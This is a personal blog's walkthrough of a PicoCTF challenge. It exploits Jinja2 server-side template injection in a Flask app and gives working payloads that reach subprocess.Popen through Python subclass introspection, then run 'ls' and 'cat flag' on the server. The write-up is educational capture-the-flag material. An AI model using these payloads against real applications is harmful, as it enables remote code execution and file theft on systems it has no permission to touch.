<!DOCTYPE html>
<html lang="en-US"><head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script><meta charset="utf-8">
<meta http-equiv="content-type" content="text/html">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title itemprop="name">My First SSTI Adventure: A PicoCTF Walkthrough | Satish&#39;s Scribbles</title>
<meta property="og:title" content="My First SSTI Adventure: A PicoCTF Walkthrough | Satish&#39;s Scribbles" />
<meta name="twitter:title" content="My First SSTI Adventure: A PicoCTF Walkthrough | Satish&#39;s Scribbles" />
<meta itemprop="name" content="My First SSTI Adventure: A PicoCTF Walkthrough | Satish&#39;s Scribbles" />
<meta name="application-name" content="My First SSTI Adventure: A PicoCTF Walkthrough | Satish&#39;s Scribbles" />
<meta property="og:site_name" content="" />

<meta name="description" content="A step-by-step journey of exploiting a Server-Side Template Injection (SSTI) vulnerability in a PicoCTF challenge to achieve Remote Code Execution (RCE).">
<meta itemprop="description" content="A step-by-step journey of exploiting a Server-Side Template Injection (SSTI) vulnerability in a PicoCTF challenge to achieve Remote Code Execution (RCE)." />
<meta property="og:description" content="A step-by-step journey of exploiting a Server-Side Template Injection (SSTI) vulnerability in a PicoCTF challenge to achieve Remote Code Execution (RCE)." />
<meta name="twitter:description" content="A step-by-step journey of exploiting a Server-Side Template Injection (SSTI) vulnerability in a PicoCTF challenge to achieve Remote Code Execution (RCE)." />

<meta property="og:locale" content="en-US" />
<meta name="language" content="en-US" />

  <link rel="alternate" hreflang="en" href="http://localhost:1313/post/picoctf-ssti-journey/" title="en-US 🇺🇸" />






<meta name="generator" content="Hugo 0.150.0">

    
    <meta property="og:url" content="http://localhost:1313/post/picoctf-ssti-journey/">
  <meta property="og:site_name" content="Satish&#39;s Scribbles">
  <meta property="og:title" content="My First SSTI Adventure: A PicoCTF Walkthrough">
  <meta property="og:description" content="A step-by-step journey of exploiting a Server-Side Template Injection (SSTI) vulnerability in a PicoCTF challenge to achieve Remote Code Execution (RCE).">
  <meta property="og:locale" content="en_US">
  <meta property="og:type" content="article">
    <meta property="article:section" content="post">
    <meta property="article:published_time" content="2025-09-09T00:00:00+00:00">
    <meta property="article:modified_time" content="2025-09-09T00:00:00+00:00">
    <meta property="article:tag" content="SSTI">
    <meta property="article:tag" content="PicoCTF">
    <meta property="article:tag" content="Cybersecurity">
    <meta property="article:tag" content="Python">
    <meta property="article:tag" content="Jinja2">
    <meta property="article:tag" content="RCE">
    <meta property="og:image" content="http://localhost:1313/images/share.webp">
        <meta property="fb:admins" content="0000000000">


    
    
  <meta name="twitter:card" content="summary_large_image">
  <meta name="twitter:image" content="http://localhost:1313/images/share.webp">
  <meta name="twitter:title" content="My First SSTI Adventure: A PicoCTF Walkthrough">
  <meta name="twitter:description" content="A step-by-step journey of exploiting a Server-Side Template Injection (SSTI) vulnerability in a PicoCTF challenge to achieve Remote Code Execution (RCE).">
      <meta name="twitter:site" content="@www.x.com/alt_maximus">


    

    <link rel="canonical" href="http://localhost:1313/post/picoctf-ssti-journey/">
    <link href="/style.min.e390ba7da26222f4dc42a349955d76dbbe44e5ce2535a43de5a70633a0a9ec3c.css" rel="stylesheet">
    <link href="/code-highlight.min.706d31975fec544a864cb7f0d847a73ea55ca1df91bf495fd12a177138d807cf.css" rel="stylesheet">

    
    <link rel="apple-touch-icon" sizes="180x180" href="/icons/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/icons/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/icons/favicon-16x16.png">
    <link rel="mask-icon" href="/icons/safari-pinned-tab.svg">
    <link rel="shortcut icon" href="/favicon.ico">




<link rel="manifest" href="http://localhost:1313/site.webmanifest">

<meta name="msapplication-config" content="/browserconfig.xml">
<meta name="msapplication-TileColor" content="#2d89ef">
<meta name="theme-color" content="#434648">

    
    <link rel="icon" type="image/svg+xml" href="/icons/favicon.svg">

    
    
</head>
<body data-theme = "" class="notransition">

<script src="/js/theme.js"></script>

<div class="navbar" role="navigation">
    <nav class="menu" aria-label="Main Navigation">
        <a href="http://localhost:1313/" class="logo">
            <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" 
viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" 
stroke-linejoin="round" class="feather feather-home">
<title></title>
<path d="M3 9l9-7 9 7v11a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2z"></path>
<polyline points="9 22 9 12 15 12 15 22"></polyline>
</svg>
        </a>
        <input type="checkbox" id="menu-trigger" class="menu-trigger" />
        <label for="menu-trigger">
            <span class="menu-icon">
                <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" stroke="currentColor" fill="none" viewBox="0 0 14 14"><title>Menu</title><path stroke-linecap="round" stroke-linejoin="round" d="M10.595 7L3.40726 7"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 3.51488L3.49301 3.51488"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 10.4851H3.49301"></path><path stroke-linecap="round" stroke-linejoin="round" d="M0.5 12.5V1.5C0.5 0.947715 0.947715 0.5 1.5 0.5H12.5C13.0523 0.5 13.5 0.947715 13.5 1.5V12.5C13.5 13.0523 13.0523 13.5 12.5 13.5H1.5C0.947715 13.5 0.5 13.0523 0.5 12.5Z"></path></svg>
            </span>
        </label>

        <div class="trigger">
            <ul class="trigger-container">
                
                
                <li>
                    <a class="menu-link " href="/">
                        Home
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link " href="/">
                        About
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link " href="/blog/">
                        Blog
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link " href="/contact/">
                        Contact
                    </a>
                    
                </li>
                
                <li class="menu-separator">
                    <span>|</span>
                </li>
                
                
            </ul>
            <a id="mode" href="#">
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-sunny" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>LIGHT</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-moon" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>DARK</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
            </a>
        </div>
    </nav>
</div>

<div class="wrapper post">
    <main class="page-content" aria-label="Content">
        <article>
            <header class="header">
                <h1 class="header-title">My First SSTI Adventure: A PicoCTF Walkthrough</h1>
                
                
                
                <div class="post-meta">
                    <time datetime="2025-09-09T00:00:00&#43;00:00" itemprop="datePublished"> Tuesday, Sep 9, 2025 </time>
                </div>
                
            </header>
            
            <div class="page-content">
                <p>I recently dove into the world of Server-Side Template Injection (SSTI) and it was a blast! I decided to tackle a PicoCTF challenge to test my skills, and it turned out to be a fantastic learning experience. Here’s a breakdown of my journey from finding the vulnerability to getting the flag, as it happened.</p>
<hr>
<h2 id="what-is-ssti">What is SSTI?</h2>
<p>SSTI, or Server-Side Template Injection, is a vulnerability that occurs when an attacker can inject malicious code into a template, which is then executed on the server. This can lead to serious consequences, including Remote Code Execution (RCE), allowing the attacker to run arbitrary commands on the server.</p>
<h2 id="the-challenge-begins">The Challenge Begins</h2>
<p>The PicoCTF challenge presented a simple website with an input field. Whatever I entered was &ldquo;announced&rdquo; on a new page. This immediately screamed &ldquo;template engine&rdquo; to me.</p>
<p>To confirm my suspicions, I used Wappalyzer, a browser extension that identifies technologies used on websites. It revealed the site was built with <strong>Python 3.8.10</strong> and <strong>Flask 3.0.3</strong>. The most common template engine for Flask is <strong>Jinja2</strong>, so that was my prime suspect.</p>
<p>My first test was to see if the server would execute a simple expression. I entered:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-jinja" data-lang="jinja"><span class="line"><span class="ln">1</span><span class="cl"><span class="cp">{{</span> <span class="m">7</span> <span class="o">*</span> <span class="m">7</span> <span class="cp">}}</span><span class="x">
</span></span></span></code></pre></div><p>The result was <code>49</code>. Bingo! This confirmed three things:</p>
<ol>
<li>The application is vulnerable to SSTI.</li>
<li>The server is using a Python and Flask setup.</li>
<li>The template engine is likely Jinja2.</li>
</ol>
<p>Now, the real question: could I take this from a simple calculation to full-blown RCE?</p>
<hr>
<h2 id="the-path-to-rce">The Path to RCE</h2>
<p>My goal was to execute shell commands. In Python, the <code>subprocess.Popen</code> class is a powerful tool for this. The challenge was to access it from within the restricted Jinja2 template environment.</p>
<p>The standard payload to access subclasses in Python is:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="ln">1</span><span class="cl"><span class="s1">&#39;&#39;</span><span class="o">.</span><span class="vm">__class__</span><span class="o">.</span><span class="n">__base__</span><span class="o">.</span><span class="n">__subclasses__</span><span class="p">()</span>
</span></span></code></pre></div><p>This gives you a list of all the classes loaded in the Python environment. I needed to find <code>Popen</code> in that list.</p>
<h3 id="local-proof-of-concept">Local Proof-of-Concept</h3>
<p>On my local machine, I found that <code>Popen</code> was at index <code>294</code>. I could then use it to run commands like <code>id</code> and <code>ls -la</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="ln">1</span><span class="cl"><span class="c1"># Execute &#39;id&#39;</span>
</span></span><span class="line"><span class="ln">2</span><span class="cl"><span class="o">&gt;&gt;&gt;</span> <span class="s1">&#39;&#39;</span><span class="o">.</span><span class="vm">__class__</span><span class="o">.</span><span class="n">__base__</span><span class="o">.</span><span class="n">__subclasses__</span><span class="p">()[</span><span class="mi">294</span><span class="p">](</span><span class="s1">&#39;id&#39;</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="kc">True</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=-</span><span class="mi">1</span><span class="p">)</span><span class="o">.</span><span class="n">communicate</span><span class="p">()</span>
</span></span><span class="line"><span class="ln">3</span><span class="cl">
</span></span><span class="line"><span class="ln">4</span><span class="cl"><span class="c1"># Execute &#39;ls -la&#39;</span>
</span></span><span class="line"><span class="ln">5</span><span class="cl"><span class="o">&gt;&gt;&gt;</span> <span class="s1">&#39;&#39;</span><span class="o">.</span><span class="vm">__class__</span><span class="o">.</span><span class="n">__base__</span><span class="o">.</span><span class="n">__subclasses__</span><span class="p">()[</span><span class="mi">294</span><span class="p">](</span><span class="s1">&#39;ls -la&#39;</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="kc">True</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=-</span><span class="mi">1</span><span class="p">)</span><span class="o">.</span><span class="n">communicate</span><span class="p">()</span>
</span></span><span class="line"><span class="ln">6</span><span class="cl"><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;total 48</span><span class="se">\n</span><span class="s1">drwxr-xr-x@  7 satishpatra  staff   224  4 Sep 23:35 .</span><span class="se">\n</span><span class="s1">...</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="kc">None</span><span class="p">)</span>
</span></span></code></pre></div><p>The output of <code>communicate()</code> is a tuple <code>(stdout, stderr)</code>, and <code>stdout</code> is a byte string. To get a clean string, I used <code>.communicate()[0].decode()</code> and <code>print()</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="ln">1</span><span class="cl"><span class="o">&gt;&gt;&gt;</span> <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;&#39;</span><span class="o">.</span><span class="vm">__class__</span><span class="o">.</span><span class="n">__base__</span><span class="o">.</span><span class="n">__subclasses__</span><span class="p">()[</span><span class="mi">294</span><span class="p">](</span><span class="s1">&#39;ls -la&#39;</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="kc">True</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=-</span><span class="mi">1</span><span class="p">)</span><span class="o">.</span><span class="n">communicate</span><span class="p">()[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">decode</span><span class="p">())</span>
</span></span><span class="line"><span class="ln">2</span><span class="cl"><span class="n">total</span> <span class="mi">48</span>
</span></span><span class="line"><span class="ln">3</span><span class="cl"><span class="n">drwxr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span><span class="o">@</span>  <span class="mi">7</span> <span class="n">satishpatra</span>  <span class="n">staff</span>   <span class="mi">224</span>  <span class="mi">4</span> <span class="n">Sep</span> <span class="mi">23</span><span class="p">:</span><span class="mi">35</span> <span class="o">.</span>
</span></span><span class="line"><span class="ln">4</span><span class="cl"><span class="o">...</span>
</span></span></code></pre></div><h3 id="the-picoctf-roadblock">The PicoCTF Roadblock</h3>
<p>When I tried the same payload on the PicoCTF server, I hit a wall.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-jinja" data-lang="jinja"><span class="line"><span class="ln">1</span><span class="cl"><span class="cp">{{</span> <span class="s1">&#39;&#39;</span><span class="nv">.__class__.__base__.__subclasses__</span><span class="o">()[</span><span class="m">294</span><span class="o">](</span><span class="s1">&#39;ls -la&#39;</span><span class="o">,</span> <span class="nv">shell</span><span class="o">=</span><span class="kp">True</span><span class="o">,</span> <span class="nv">stdout</span><span class="o">=-</span><span class="m">1</span><span class="o">)</span><span class="nv">.communicate</span><span class="o">()[</span><span class="m">0</span><span class="o">]</span><span class="nv">.decode</span><span class="o">()</span> <span class="cp">}}</span><span class="x">
</span></span></span></code></pre></div><p>This resulted in an &ldquo;Internal Server Error.&rdquo; Why? The index of <code>Popen</code> was different on the server. I was flying blind. I even tried to see what <code>{{ ''.__class__.__base__.__subclasses__() }}</code> would return, and I got <code>&lt;class 'tempfile._TemporaryFileCloser'&gt;</code>, which was not what I expected. The Python version on the server was <code>3.8.10</code>, which was different from my local setup.</p>
<p>My next step was to find the correct index of <code>Popen</code> on the target server. I couldn&rsquo;t just print the whole list of subclasses, so I used a loop within the template to search for it:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-jinja" data-lang="jinja"><span class="line"><span class="ln">1</span><span class="cl"><span class="cp">{%</span>- <span class="k">for</span> <span class="nv">c</span> <span class="k">in</span> <span class="s1">&#39;&#39;</span><span class="nv">.__class__.__base__.__subclasses__</span><span class="o">()</span> -<span class="cp">%}</span><span class="x">
</span></span></span><span class="line"><span class="ln">2</span><span class="cl"><span class="x"></span><span class="cp">{%</span>- <span class="k">if</span> <span class="s1">&#39;Popen&#39;</span> <span class="k">in</span> <span class="nv">c.__name__</span> -<span class="cp">%}</span><span class="x">
</span></span></span><span class="line"><span class="ln">3</span><span class="cl"><span class="x"></span><span class="cp">{{</span> <span class="nv">c.__name__</span> <span class="cp">}}</span><span class="x"> </span><span class="cp">{{</span> <span class="nb">loop</span><span class="nv">.index0</span> <span class="cp">}}</span><span class="x">
</span></span></span><span class="line"><span class="ln">4</span><span class="cl"><span class="x"></span><span class="cp">{%</span>- <span class="k">endif</span> -<span class="cp">%}</span><span class="x">
</span></span></span><span class="line"><span class="ln">5</span><span class="cl"><span class="x"></span><span class="cp">{%</span>- <span class="k">endfor</span> -<span class="cp">%}</span><span class="x">
</span></span></span></code></pre></div><p>And there it was:</p>
<pre tabindex="0"><code>Popen 356
</code></pre><p>The index was <code>356</code>! I restarted the instance to see if it would change, but it remained the same. This meant I could reliably use this index for my payload.</p>
<hr>
<h2 id="victory">Victory!</h2>
<p>Now, with the correct index, I could craft my final payload. I tried to use <code>print()</code> at first, but it kept causing errors:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-jinja" data-lang="jinja"><span class="line"><span class="ln">1</span><span class="cl"><span class="cp">{{</span> <span class="nv">print</span><span class="o">(</span><span class="s1">&#39;&#39;</span><span class="nv">.__class__.__base__.__subclasses__</span><span class="o">()[</span><span class="m">356</span><span class="o">](</span><span class="s1">&#39;ls -la&#39;</span><span class="o">,</span> <span class="nv">shell</span><span class="o">=</span><span class="kp">True</span><span class="o">,</span> <span class="nv">stdout</span><span class="o">=-</span><span class="m">1</span><span class="o">)</span><span class="nv">.communicate</span><span class="o">()[</span><span class="m">0</span><span class="o">]</span><span class="nv">.decode</span><span class="o">())</span>
</span></span><span class="line"><span class="ln">2</span><span class="cl"><span class="cp">}}</span><span class="x">
</span></span></span></code></pre></div><p>This didn&rsquo;t work. The <code>format()</code> method, however, worked like a charm.</p>
<p>My final payload to list the files was:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-jinja" data-lang="jinja"><span class="line"><span class="ln">1</span><span class="cl"><span class="cp">{{</span> <span class="s1">&#39;Command Output --&gt; {}&#39;</span><span class="nv">.format</span><span class="o">(</span><span class="s1">&#39;&#39;</span><span class="nv">.__class__.__base__.__subclasses__</span><span class="o">()[</span><span class="m">356</span><span class="o">](</span><span class="s1">&#39;ls -la&#39;</span><span class="o">,</span> <span class="nv">shell</span><span class="o">=</span><span class="kp">True</span><span class="o">,</span> <span class="nv">stdout</span><span class="o">=-</span><span class="m">1</span><span class="o">)</span><span class="nv">.communicate</span><span class="o">()[</span><span class="m">0</span><span class="o">]</span><span class="nv">.decode</span><span class="o">())</span> <span class="cp">}}</span><span class="x">
</span></span></span></code></pre></div><p>While the output on the page was a bit messy, inspecting the HTML revealed the formatted output:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="ln">1</span><span class="cl"><span class="cp">&lt;!doctype html&gt;</span>
</span></span><span class="line"><span class="ln">2</span><span class="cl"><span class="p">&lt;</span><span class="nt">h1</span> <span class="na">style</span><span class="o">=</span><span class="s">&#34;font-size:100px;&#34;</span> <span class="na">align</span><span class="o">=</span><span class="s">&#34;center&#34;</span><span class="p">&gt;</span>Command Output --<span class="ni">&amp;gt;</span> total 12
</span></span><span class="line"><span class="ln">3</span><span class="cl">drwxr-xr-x 1 root root   25 Sep  8 18:44 .
</span></span><span class="line"><span class="ln">4</span><span class="cl">drwxr-xr-x 1 root root   23 Sep  8 18:44 ..
</span></span><span class="line"><span class="ln">5</span><span class="cl">drwxr-xr-x 2 root root   32 Sep  8 18:44 __pycache__
</span></span><span class="line"><span class="ln">6</span><span class="cl">-rwxr-xr-x 1 root root 1241 May  1 15:59 app.py
</span></span><span class="line"><span class="ln">7</span><span class="cl">-rw-r--r-- 1 root root   58 Aug 21 19:26 flag
</span></span><span class="line"><span class="ln">8</span><span class="cl">-rwxr-xr-x 1 root root  268 May  1 15:59 requirements.txt
</span></span><span class="line"><span class="ln">9</span><span class="cl"><span class="p">&lt;/</span><span class="nt">h1</span><span class="p">&gt;</span>
</span></span></code></pre></div><p>I saw a <code>flag</code> file! The final step was to read it:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-jinja" data-lang="jinja"><span class="line"><span class="ln">1</span><span class="cl"><span class="cp">{{</span> <span class="s1">&#39;Command Output --&gt; {}&#39;</span><span class="nv">.format</span><span class="o">(</span><span class="s1">&#39;&#39;</span><span class="nv">.__class__.__base__.__subclasses__</span><span class="o">()[</span><span class="m">356</span><span class="o">](</span><span class="s1">&#39;cat flag&#39;</span><span class="o">,</span> <span class="nv">shell</span><span class="o">=</span><span class="kp">True</span><span class="o">,</span> <span class="nv">stdout</span><span class="o">=-</span><span class="m">1</span><span class="o">)</span><span class="nv">.communicate</span><span class="o">()[</span><span class="m">0</span><span class="o">]</span><span class="nv">.decode</span><span class="o">())</span> <span class="cp">}}</span><span class="x">
</span></span></span></code></pre></div><p>Success! The flag was revealed:</p>
<p><strong><code>picoCTF{s4rv3r_s1d3_t3mp14t3_1nj3ct10n5_4r3_c001_bdc95c1a}</code></strong></p>
<p>Decoding the flag gives us &ldquo;server side template injections are cool.&rdquo; I couldn&rsquo;t decode the <code>bdc95c1a</code> part, which might be a hash. This was my first real dive into SSTI, and it was an incredibly rewarding experience. I&rsquo;m excited to explore this vulnerability further!</p>
<hr>
<h2 id="related-posts">Related Posts</h2>
<ul>
<li><a href="/post/ssti-study-and-rootme-challenge/">Deepening My SSTI Knowledge: From Study to a Root-Me RCE</a></li>
</ul>

            </div>
        </article></main>
</div>
<footer class="footer">
    <span class="footer_item"> </span>
    &nbsp;

    <div class="footer_social-icons">
</div>
    <small class="footer_copyright">
        © 2025 Satish Patra.
        
    </small>
</footer>







    
    <script async src="http://localhost:1313/js/main.js" ></script>

    

</body>
</html>
